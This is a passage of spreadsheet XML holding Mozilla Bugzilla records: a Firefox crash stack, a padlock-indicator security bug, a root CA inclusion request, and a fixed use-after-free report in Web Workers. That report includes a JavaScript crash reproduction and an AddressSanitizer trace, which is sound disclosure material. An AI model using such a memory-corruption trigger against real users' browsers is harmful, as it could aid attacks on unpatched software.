 	gklayout.dll!nsBlockFrame::ReflowLine(nsBlockReflowState &amp; aState={...}, nsLineList_iterator aLine={...}, int * aKeepReflowGoing=0x0012ba2c)  Line 2384 + 0x1b bytes	C++
 	gklayout.dll!nsBlockFrame::ReflowDirtyLines(nsBlockReflowState &amp; aState={...})  Line 1885 + 0x1b bytes	C++
 	gklayout.dll!nsBlockFrame::Reflow(nsPresContext * aPresContext=0x05bf97a0, nsHTMLReflowMetrics &amp; aMetrics={...}, const nsHTMLReflowState &amp; aReflowState={...}, unsigned int &amp; aStatus=0)  Line 993 + 0xf bytes	C++
 	gklayout.dll!nsBlockReflowContext::ReflowBlock(const nsRect &amp; aSpace={...}, int aApplyTopMargin=1, nsCollapsingMargin &amp; aPrevMargin={...}, int aClearance=0, int aIsAdjacentWithTop=1, nsLineBox * aLine=0x01bb03d0, nsHTMLReflowState &amp; aFrameRS={...}, unsigned int &amp; aFrameReflowStatus=0, nsBlockReflowState &amp; aState={...})  Line 310 + 0x2c bytes	C++
 	gklayout.dll!nsBlockFrame::ReflowBlockFrame(nsBlockReflowState &amp; aState={...}, nsLineList_iterator aLine={...}, int * aKeepReflowGoing=0x0012c544)  Line 3115 + 0x45 bytes	C++
 	gklayout.dll!nsBlockFrame::ReflowLine(nsBlockReflowState &amp; aState={...}, nsLineList_iterator aLine={...}, int * aKeepReflowGoing=0x0012c544)  Line 2384 + 0x1b bytes	C++
 	gklayout.dll!nsBlockFrame::ReflowDirtyLines(nsBlockReflowState &amp; aState={...})  Line 1885 + 0x1b bytes	C++
 	gklayout.dll!nsBlockFrame::Reflow(nsPresContext * aPresContext=0x05bf97a0, nsHTMLReflowMetrics &amp; aMetrics={...}, const nsHTMLReflowState &amp; aReflowState={...}, unsigned int &amp; aStatus=0)  Line 993 + 0xf bytes	C++
 	gklayout.dll!nsBlockReflowContext::ReflowBlock(const nsRect &amp; aSpace={...}, int aApplyTopMargin=1, nsCollapsingMargin &amp; aPrevMargin={...}, int aClearance=0, int aIsAdjacentWithTop=1, nsLineBox * aLine=0x00000000, nsHTMLReflowState &amp; aFrameRS={...}, unsigned int &amp; aFrameReflowStatus=0, nsBlockReflowState &amp; aState={...})  Line 310 + 0x2c bytes	C++
 	gklayout.dll!nsBlockFrame::ReflowFloat(nsBlockReflowState &amp; aState={...}, const nsRect &amp; aFloatAvailableSpace={...}, nsIFrame * aFloat=0x01bafa20, nsMargin &amp; aFloatMargin={...}, unsigned int &amp; aReflowStatus=0)  Line 5657 + 0x35 bytes	C++
 	gklayout.dll!nsBlockReflowState::FlowAndPlaceFloat(nsIFrame * aFloat=0x01bafa20, unsigned int &amp; aReflowStatus=0, int aForceFit=1)  Line 768	C++
 	gklayout.dll!nsBlockReflowState::AddFloat(nsLineLayout * aLineLayout=0x0012d09c, nsIFrame * aFloat=0x01bafa20, int aAvailableWidth=58428, unsigned int &amp; aReflowStatus=0)  Line 580 + 0x17 bytes	C++
 	gklayout.dll!nsLineLayout::AddFloat(nsIFrame * aFloat=0x01bafa20, int aAvailableWidth=58428, unsigned int &amp; aReflowStatus=0)  Line 218	C++
 	gklayout.dll!nsLineLayout::ReflowFrame(nsIFrame * aFrame=0x01bafa88, unsigned int &amp; aReflowStatus=0, nsHTMLReflowMetrics * aMetrics=0x00000000, int &amp; aPushedFrame=0)  Line 892 + 0x1d bytes	C++
 	gklayout.dll!nsBlockFrame::ReflowInlineFrame(nsBlockReflowState &amp; aState={...}, nsLineLayout &amp; aLineLayout={...}, nsLineList_iterator aLine={...}, nsIFrame * aFrame=0x01bafa88, LineReflowStatus * aLineReflowStatus=0x0012d024)  Line 3745 + 0x16 bytes	C++
 	gklayout.dll!nsBlockFrame::DoReflowInlineFrames(nsBlockReflowState &amp; aState={...}, nsLineLayout &amp; aLineLayout={...}, nsLineList_iterator aLine={...}, nsFlowAreaRect &amp; aFloatAvailableSpace={...}, int &amp; aAvailableSpaceHeight=0, nsFloatManager::SavedState * aFloatStateBeforeLine=0x0012d090, int * aKeepReflowGoing=0x0012d4a4, LineReflowStatus * aLineReflowStatus=0x0012d158, int aAllowPullUp=1)  Line 3539 + 0x23 bytes	C++
 	gklayout.dll!nsBlockFrame::ReflowInlineFrames(nsBlockReflowState &amp; aState={...}, nsLineList_iterator aLine={...}, int * aKeepReflowGoing=0x0012d4a4)  Line 3396 + 0x39 bytes	C++
 	gklayout.dll!nsBlockFrame::ReflowLine(nsBlockReflowState &amp; aState={...}, nsLineList_iterator aLine={...}, int * aKeepReflowGoing=0x0012d4a4)  Line 2439 + 0x1b bytes	C++
 	gklayout.dll!nsBlockFrame::ReflowDirtyLines(nsBlockReflowState &amp; aState={...})  Line 1885 + 0x1b bytes	C++
 	gklayout.dll!nsBlockFrame::Reflow(nsPresContext * aPresContext=0x05bf97a0, nsHTMLReflowMetrics &amp; aMetrics={...}, const nsHTMLReflowState &amp; aReflowState={...}, unsigned int &amp; aStatus=0)  Line 993 + 0xf bytes	C++
 	gklayout.dll!nsBlockReflowContext::ReflowBlock(const nsRect &amp; aSpace={...}, int aApplyTopMargin=0, nsCollapsingMargin &amp; aPrevMargin={...}, int aClearance=0, int aIsAdjacentWithTop=1, nsLineBox * aLine=0x01bb0420, nsHTMLReflowState &amp; aFrameRS={...}, unsigned int &amp; aFrameReflowStatus=0, nsBlockReflowState &amp; aState={...})  Line 310 + 0x2c bytes	C++
 	gklayout.dll!nsBlockFrame::ReflowBlockFrame(nsBlockReflowState &amp; aState={...}, nsLineList_iterator aLine={...}, int * aKeepReflowGoing=0x0012dfbc)  Line 3115 + 0x45 bytes	C++
 	gklayout.dll!nsBlockFrame::ReflowLine(nsBlockReflowState &amp; aState={...}, nsLineList_iterator aLine={...}, int * aKeepReflowGoing=0x0012dfbc)  Line 2384 + 0x1b bytes	C++
 	gklayout.dll!nsBlockFrame::ReflowDirtyLines(nsBlockReflowState &amp; aState={...})  Line 1885 + 0x1b bytes	C++
 	gklayout.dll!nsBlockFrame::Reflow(nsPresContext * aPresContext=0x05bf97a0, nsHTMLReflowMetrics &amp; aMetrics={...}, const nsHTMLReflowState &amp; aReflowState={...}, unsigned int &amp; aStatus=0)  Line 993 + 0xf bytes	C++
 	gklayout.dll!nsBlockReflowContext::ReflowBlock(const nsRect &amp; aSpace={...}, int aApplyTopMargin=1, nsCollapsingMargin &amp; aPrevMargin={...}, int aClearance=0, int aIsAdjacentWithTop=1, nsLineBox * aLine=0x01bb0448, nsHTMLReflowState &amp; aFrameRS={...}, unsigned int &amp; aFrameReflowStatus=0, nsBlockReflowState &amp; aState={...})  Line 310 + 0x2c bytes	C++
 	gklayout.dll!nsBlockFrame::ReflowBlockFrame(nsBlockReflowState &amp; aState={...}, nsLineList_iterator aLine={...}, int * aKeepReflowGoing=0x0012ead4)  Line 3115 + 0x45 bytes	C++
 	gklayout.dll!nsBlockFrame::ReflowLine(nsBlockReflowState &amp; aState={...}, nsLineList_iterator aLine={...}, int * aKeepReflowGoing=0x0012ead4)  Line 2384 + 0x1b bytes	C++
 	gklayout.dll!nsBlockFrame::ReflowDirtyLines(nsBlockReflowState &amp; aState={...})  Line 1885 + 0x1b bytes	C++
 	gklayout.dll!nsBlockFrame::Reflow(nsPresContext * aPresContext=0x05bf97a0, nsHTMLReflowMetrics &amp; aMetrics={...}, const nsHTMLReflowState &amp; aReflowState={...}, unsigned int &amp; aStatus=0)  Line 993 + 0xf bytes	C++
 	gklayout.dll!nsContainerFrame::ReflowChild(nsIFrame * aKidFrame=0x01b9d750, nsPresContext * aPresContext=0x05bf97a0, nsHTMLReflowMetrics &amp; aDesiredSize={...}, const nsHTMLReflowState &amp; aReflowState={...}, int aX=0, int aY=0, unsigned int aFlags=0, unsigned int &amp; aStatus=0, nsOverflowContinuationTracker * aTracker=0x00000000)  Line 774 + 0x21 bytes	C++
 	gklayout.dll!nsCanvasFrame::Reflow(nsPresContext * aPresContext=0x05bf97a0, nsHTMLReflowMetrics &amp; aDesiredSize={...}, const nsHTMLReflowState &amp; aReflowState={...}, unsigned int &amp; aStatus=0)  Line 554	C++
 	gklayout.dll!nsContainerFrame::ReflowChild(nsIFrame * aKidFrame=0x01ba9d00, nsPresContext * aPresContext=0x05bf97a0, nsHTMLReflowMetrics &amp; aDesiredSize={...}, const nsHTMLReflowState &amp; aReflowState={...}, int aX=0, int aY=0, unsigned int aFlags=3, unsigned int &amp; aStatus=0, nsOverflowContinuationTracker * aTracker=0x00000000)  Line 774 + 0x21 bytes	C++
 	gklayout.dll!nsHTMLScrollFrame::ReflowScrolledFrame(ScrollReflowState * aState=0x0012f450, int aAssumeHScroll=0, int aAssumeVScroll=1, nsHTMLReflowMetrics * aMetrics=0x0012f3a4, int aFirstPass=1)  Line 545 + 0x30 bytes	C++
 	gklayout.dll!nsHTMLScrollFrame::ReflowContents(ScrollReflowState * aState=0x0012f450, const nsHTMLReflowMetrics &amp; aDesiredSize={...})  Line 639 + 0x35 bytes	C++
 	gklayout.dll!nsHTMLScrollFrame::Reflow(nsPresContext * aPresContext=0x05bf97a0, nsHTMLReflowMetrics &amp; aDesiredSize={...}, const nsHTMLReflowState &amp; aReflowState={...}, unsigned int &amp; aStatus=0)  Line 840 + 0x13 bytes	C++
 	gklayout.dll!nsContainerFrame::ReflowChild(nsIFrame * aKidFrame=0x01ba9e78, nsPresContext * aPresContext=0x05bf97a0, nsHTMLReflowMetrics &amp; aDesiredSize={...}, const nsHTMLReflowState &amp; aReflowState={...}, int aX=0, int aY=0, unsigned int aFlags=0, unsigned int &amp; aStatus=0, nsOverflowContinuationTracker * aTracker=0x00000000)  Line 774 + 0x21 bytes	C++
 	gklayout.dll!ViewportFrame::Reflow(nsPresContext * aPresContext=0x05bf97a0, nsHTMLReflowMetrics &amp; aDesiredSize={...}, const nsHTMLReflowState &amp; aReflowState={...}, unsigned int &amp; aStatus=0)  Line 285 + 0x2d bytes	C++
 	gklayout.dll!PresShell::DoReflow(nsIFrame * target=0x01ba9b00, int aInterruptible=1)  Line 7373	C++
 	gklayout.dll!PresShell::ProcessReflowCommands(int aInterruptible=1)  Line 7493 + 0x10 bytes	C++
 	gklayout.dll!PresShell::FlushPendingNotifications(mozFlushType aType=Flush_InterruptibleLayout)  Line 4930 + 0x12 bytes	C++
 	gklayout.dll!PresShell::ReflowEvent::Run()  Line 7180	C++
 	xpcom_core.dll!nsThread::ProcessNextEvent(int mayWait=1, int * result=0x0012fa18)  Line 527 + 0x19 bytes	C++
 	xpcom_core.dll!NS_ProcessNextEvent_P(nsIThread * thread=0x00d924b0, int mayWait=1)  Line 250 + 0x16 bytes	C++
 	gkwidget.dll!nsBaseAppShell::Run()  Line 170 + 0xc bytes	C++
 	toolkitcomps.dll!nsAppStartup::Run()  Line 182 + 0x1c bytes	C++
 	xul.dll!XRE_main(int argc=4, char * * argv=0x00d3c800, const nsXREAppData * aAppData=0x00d3cf90)  Line 3499 + 0x25 bytes	C++
 	firefox.exe!NS_internal_main(int argc=4, char * * argv=0x00d3c800)  Line 158 + 0x12 bytes	C++
 	firefox.exe!wmain(int argc=4, wchar_t * * argv=0x00d389d8)  Line 120 + 0xd bytes	C++
 	firefox.exe!__tmainCRTStartup()  Line 594 + 0x19 bytes	C
 	firefox.exe!wmainCRTStartup()  Line 414	C
 	kernel32.dll!7c817077() 	
 	[Frames below may be incorrect and/or missing, no symbols loaded for kernel32.dll]	
 	mozjs.dll!nanojit::Assembler::resourceConsistencyCheck()  Line 256 + 0x37 bytes	C++
 	uconv.dll!nsShiftJISToUnicodeConstructor(nsISupports * aOuter=0x00720070, const nsID &amp; aIID={...}, void * * aResult=0x00730065)  Line 436 + 0x8a bytes	C++
 	xpcom_core.dll!nsSupportsCharImpl::AddRef()  Line 449 + 0xa3 bytes	C++</t>
        </is>
      </c>
      <c r="X305" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="306">
      <c r="A306" t="n">
        <v>1165702</v>
      </c>
      <c r="B306" t="inlineStr">
        <is>
          <t>2015-05-17 07:48:32 -0700</t>
        </is>
      </c>
      <c r="C306" t="inlineStr">
        <is>
          <t>Remove webapp/logs/.gitkeep</t>
        </is>
      </c>
      <c r="D306" t="inlineStr">
        <is>
          <t>2021-12-05 14:49:36 -0800</t>
        </is>
      </c>
      <c r="E306" t="n">
        <v>1</v>
      </c>
      <c r="F306" t="n">
        <v>1</v>
      </c>
      <c r="G306" t="n">
        <v>7</v>
      </c>
      <c r="H306" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I306" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J306" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K306" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L306" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M306" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N306" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O306" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P306" t="inlineStr"/>
      <c r="Q306" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R306" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S306" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T306" t="n">
        <v>1</v>
      </c>
      <c r="U306" t="n">
        <v>0</v>
      </c>
      <c r="V306" t="n">
        <v>4</v>
      </c>
      <c r="W306" t="inlineStr">
        <is>
          <t>The directory is empty apart from a .gitkeep, since it only exists to house jstd.log, output by watchr.rb. I was going to move the directory around in bug 1056877, but let's just delete the directory and move the log file one directory higher up.</t>
        </is>
      </c>
      <c r="X306" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="307">
      <c r="A307" t="n">
        <v>257308</v>
      </c>
      <c r="B307" t="inlineStr">
        <is>
          <t>2004-08-29 05:06:27 -0700</t>
        </is>
      </c>
      <c r="C307" t="inlineStr">
        <is>
          <t>Visual indicators of site security appear for the wrong site (lock icon)</t>
        </is>
      </c>
      <c r="D307" t="inlineStr">
        <is>
          <t>2008-06-11 01:00:50 -0700</t>
        </is>
      </c>
      <c r="E307" t="n">
        <v>1</v>
      </c>
      <c r="F307" t="n">
        <v>1</v>
      </c>
      <c r="G307" t="n">
        <v>3</v>
      </c>
      <c r="H307" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I307" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J307" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K307" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L307" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M307" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N307" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O307" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P307" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q307" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R307" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S307" t="inlineStr">
        <is>
          <t>mozilla1.8beta1</t>
        </is>
      </c>
      <c r="T307" t="n">
        <v>1</v>
      </c>
      <c r="U307" t="n">
        <v>0</v>
      </c>
      <c r="V307" t="n">
        <v>52</v>
      </c>
      <c r="W307" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.2) Gecko/20040819 Firefox/0.8 StumbleUpon/1.9 (MOOX M2)
Build Identifier: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.2) Gecko/20040819 Firefox/0.8 (MOOX M2)
If I'm on an http site, then I click a link on that site to a totally unrelated
https server which provides a downloadable file - not a file that can be viewed
in Firefox, and not where the link target is a new window - then the address bar
for the currently viewed HTTP site goes yellow, and the security box on the
status bar shows the http site with a padlock. In other words, the HTTP site is
reported as taking on the security characteristics of the HTTPS server that is
supplying the file rather than the currently-viewed page.
Further discussion here: http://forums.mozillazine.org/viewtopic.php?t=117908
Reproducible: Always
Steps to Reproduce:
1.Find or create a link on a HTML page hosted on a HTTP server that points to a
downloadable file on an unrelated HTTPS server.
2.Click that link.
3.Accept the file or cancel (the visual indications change before you make the
choice anyway.)
Actual Results:  
Address bar background changes yellow.
Status bar security field displays the HTTP server name with a padlock, and
changes the tool-tip to mention the HTTPS's certificate issuing authority.
Expected Results:  
Made none of the above changes in the UI.
Perhaps the relevant section of the download manager window should go yellow
instead, but I'm sure that's a separate issue...
The linked-to discussion leads me to believe that the yellow-bar feature may
only be visible in more recent builds.</t>
        </is>
      </c>
      <c r="X307" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="308">
      <c r="A308" t="n">
        <v>394419</v>
      </c>
      <c r="B308" t="inlineStr">
        <is>
          <t>2007-08-31 00:03:12 -0700</t>
        </is>
      </c>
      <c r="C308" t="inlineStr">
        <is>
          <t>Add secomtrust EV Root CA</t>
        </is>
      </c>
      <c r="D308" t="inlineStr">
        <is>
          <t>2022-11-14 14:23:30 -0800</t>
        </is>
      </c>
      <c r="E308" t="n">
        <v>1</v>
      </c>
      <c r="F308" t="n">
        <v>1</v>
      </c>
      <c r="G308" t="n">
        <v>5</v>
      </c>
      <c r="H308" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I308" t="inlineStr">
        <is>
          <t>CA Program</t>
        </is>
      </c>
      <c r="J308" t="inlineStr">
        <is>
          <t>CA Certificate Root Program</t>
        </is>
      </c>
      <c r="K308" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L308" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M308" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N308" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O308" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P308" t="inlineStr">
        <is>
          <t>Approved</t>
        </is>
      </c>
      <c r="Q308" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R308" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S308" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T308" t="n">
        <v>1</v>
      </c>
      <c r="U308" t="n">
        <v>0</v>
      </c>
      <c r="V308" t="n">
        <v>73</v>
      </c>
      <c r="W308" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)
Build Identifier: IE6.0.2900.2180
We would like you to embed our Root CA called "Security Communication EV RootCA1".
The information is as follows.
CA Details
----------
CA Name:
Security Communication EV RootCA1
Website: 
One Paragraph Summary of CA, including the following:
- General nature (e.g., commercial, government,academic/research, nonprofit):
Commercial
- Primary geographical area(s) served
Japan
- Number and type of subordinate CAs Audit Type (WebTrust, ETSI etc.):
Auditor:
KPMG
Auditor Website:
http://www.kpmg.com/
Audit Document URL(s):
None
Readiness Audit Report is avaiable upon request 
URL of certificate hierarchy diagram:
Diagram is available upon request
Certificate Details
-------------------
(To be completed once for each certificate; note that we only 
include root certificates in the store, not intermediates.)
Certificate Name:
Security Communication EV RootCA1
Summary Paragraph, including the following:
- End entity certificate issuance policy,
i.e. what you plan to do with the root Certificate HTTP URL (on CA website):
　https://repository.secomtrust.net/EV-Root1/
Version:
3
SHA1 Fingerprint:
FEB8 C432 DCF9 769A CEAE 3DD8 908F FD28 8665 647D
Modulus Length (a.k.a. "key length"):
2048bits
Valid From (YYYY-MM-DD):
2007-06-06
Valid To (YYYY-MM-DD):
2037-06-06
CRL HTTP URL:
http://repository.secomtrust.net/EV-Root1/EVRoot1CRL.crl
CRL issuing frequency for end-entity certificates:
1year
OCSP URL:
None
Class (domain-validated, identity/organisationally-validated or EV):
EV
Certificate Policy URL:
https://repository.secomtrust.net/EV-Root1/
CPS URL:
https://repository.secomtrust.net/EV-Root1/EVRoot1CPS.pdf
Requested Trust Indicators (email and/or SSL and/or code):
All is desiable.
URL of website using certificate chained to this root (if applying for SSL):
https://repo2.secomtrust.net/ev.gif
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
        </is>
      </c>
      <c r="X308" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="309">
      <c r="A309" t="n">
        <v>1545345</v>
      </c>
      <c r="B309" t="inlineStr">
        <is>
          <t>2019-04-17 21:44:35 -0700</t>
        </is>
      </c>
      <c r="C309" t="inlineStr">
        <is>
          <t>Web Workers -  Use After Free with XMLHttpRequest</t>
        </is>
      </c>
      <c r="D309" t="inlineStr">
        <is>
          <t>2024-05-30 09:58:39 -0700</t>
        </is>
      </c>
      <c r="E309" t="n">
        <v>1</v>
      </c>
      <c r="F309" t="n">
        <v>1</v>
      </c>
      <c r="G309" t="n">
        <v>3</v>
      </c>
      <c r="H309" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I309" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J309" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K309" t="inlineStr">
        <is>
          <t>68 Branch</t>
        </is>
      </c>
      <c r="L309" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M309" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N309" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O309" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P309" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main76+][adv-ESR68.8+]</t>
        </is>
      </c>
      <c r="Q309" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R309" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S309" t="inlineStr">
        <is>
          <t>mozilla76</t>
        </is>
      </c>
      <c r="T309" t="n">
        <v>1</v>
      </c>
      <c r="U309" t="n">
        <v>0</v>
      </c>
      <c r="V309" t="n">
        <v>59</v>
      </c>
      <c r="W309" t="inlineStr">
        <is>
          <t>Created attachment 9059182
UAF_NoteXPCOMChild_Repro.js
Reproduction test case (full server code in attached file UAF_NoteXPCOMChild_Repro.js):
	Main Page code:
        &lt;script type="text/javascript"&gt;
        var worker = new Worker("worker0.js");
        var bc0 = new BroadcastChannel("test_channel");
        setInterval(function(){ bc0.postMessage("AAAA");}, 10);
        setTimeout(function(){location.reload();},800); 
        &lt;/script&gt;
	Worker code:
        var bc0 = new BroadcastChannel("test_channel");
        bc0.onmessage = function(e) {
        xmlReq0.send(); 
        xmlReq0.abort();
        }
        var fileReader1 =  new FileReader();
        fileReader1.onloadend = function(e) {
        xmlReq0.open("get", "nofile.js", false);
        }
        var xmlReq0 = new XMLHttpRequest();
        close();
        fileReader1.readAsArrayBuffer(new Blob(["AAAA"], {type : "text/html"}));
        fileReader1.abort();
Steps to reproduce: 
	1. Run server side script UAF_NoteXPCOMChild_Repro.js with Node.js (node UAF_NoteXPCOMChild_Repro.js).
	2. Enter http://localhost:12345 in Firefox asan build.
	3. ASAN reports a Use After Free with XMLHttpRequest:
        =================================================================
        ==7061==ERROR: AddressSanitizer: heap-use-after-free on address 0x6120000d0540 at pc 0x7faee9713b6f bp 0x7faed52472b0 sp 0x7faed52472a8
        READ of size 8 at 0x6120000d0540 thread T22 (DOM Worker)
Firefox version: 68.0a1 (2019-04-17) (64-bit)
OS: Ubuntu 16.04 LTS 64bit
Stack trace:
    =================================================================
    ==7061==ERROR: AddressSanitizer: heap-use-after-free on address 0x6120000d0540 at pc 0x7faee9713b6f bp 0x7faed52472b0 sp 0x7faed52472a8
    READ of size 8 at 0x6120000d0540 thread T22 (DOM Worker)
        #0 0x7faee9713b6e in ~nsCOMPtr_base /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:331:7
        #1 0x7faee9713b6e in mozilla::WidgetEvent::~WidgetEvent() /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/BasicEvents.h:500
        #2 0x7faef0173e9d in mozilla::WidgetEvent::~WidgetEvent() /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/BasicEvents.h:500:26
        #3 0x7faeee23825b in mozilla::dom::Event::~Event() /builds/worker/workspace/build/src/dom/events/Event.cpp:113:5
        #4 0x7faeee1c9a3d in mozilla::dom::Event::~Event() /builds/worker/workspace/build/src/dom/events/Event.cpp:109:17
        #5 0x7faee7bf5ba6 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2416:7
        #6 0x7faee7bf488e in nsCycleCollector::FreeSnowWhite(bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2607:3
        #7 0x7faee7bfe048 in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3582:3
        #8 0x7faee7bfd630 in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3411:9
        #9 0x7faee7c0119c in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3947:21
        #10 0x7faef5088dc7 in callGCCallback /builds/worker/workspace/build/src/js/src/gc/GC.cpp:1840:3
        #11 0x7faef5088dc7 in js::gc::GCRuntime::maybeCallGCCallback(JSGCStatus) /builds/worker/workspace/build/src/js/src/gc/GC.cpp:7375
        #12 0x7faef5089eff in ~AutoCallGCCallbacks /builds/worker/workspace/build/src/js/src/gc/GC.cpp:7354:32
        #13 0x7faef5089eff in js::gc::GCRuntime::gcCycle(bool, js::SliceBudget, JS::GCReason) /builds/worker/workspace/build/src/js/src/gc/GC.cpp:7464
        #14 0x7faef508d423 in js::gc::GCRuntime::collect(bool, js::SliceBudget, JS::GCReason) /builds/worker/workspace/build/src/js/src/gc/GC.cpp:7622:9
        #15 0x7faef502347d in js::gc::GCRuntime::gc(JSGCInvocationKind, JS::GCReason) /builds/worker/workspace/build/src/js/src/gc/GC.cpp:7710:3
        #16 0x7faeef978f39 in mozilla::dom::workerinternals::(anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /builds/worker/workspace/build/src/dom/workers/RuntimeService.cpp:2325:5
        #17 0x7faee7db73a1 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1180:14
        #18 0x7faee7dbd4b8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
        #19 0x7faee8e01e40 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:333:5
        #20 0x7faee8d2e5b2 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
        #21 0x7faee8d2e5b2 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
        #22 0x7faee8d2e5b2 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
        #23 0x7faee7db12fa in nsThread::ThreadFunc(void*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:454:11
        #24 0x7faf0884e05d in _pt_root /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:201:5
        #25 0x7faf084946b9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76b9)
        #26 0x7faf0751d41c in clone /build/glibc-Cl5G7W/glibc-2.23/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:109
    0x6120000d0540 is located 0 bytes inside of 272-byte region [0x6120000d0540,0x6120000d0650)
    freed by thread T22 (DOM Worker) here:
        #0 0x55c5c6461182 in free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
        #1 0x7faee7bf5ba6 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2416:7
        #2 0x7faee7bf488e in nsCycleCollector::FreeSnowWhite(bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2607:3
        #3 0x7faee7bfe048 in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3582:3
        #4 0x7faee7bfd630 in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3411:9
        #5 0x7faee7c0119c in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3947:21
        #6 0x7faef5088dc7 in callGCCallback /builds/worker/workspace/build/src/js/src/gc/GC.cpp:1840:3
        #7 0x7faef5088dc7 in js::gc::GCRuntime::maybeCallGCCallback(JSGCStatus) /builds/worker/workspace/build/src/js/src/gc/GC.cpp:7375
        #8 0x7faef5089eff in ~AutoCallGCCallbacks /builds/worker/workspace/build/src/js/src/gc/GC.cpp:7354:32
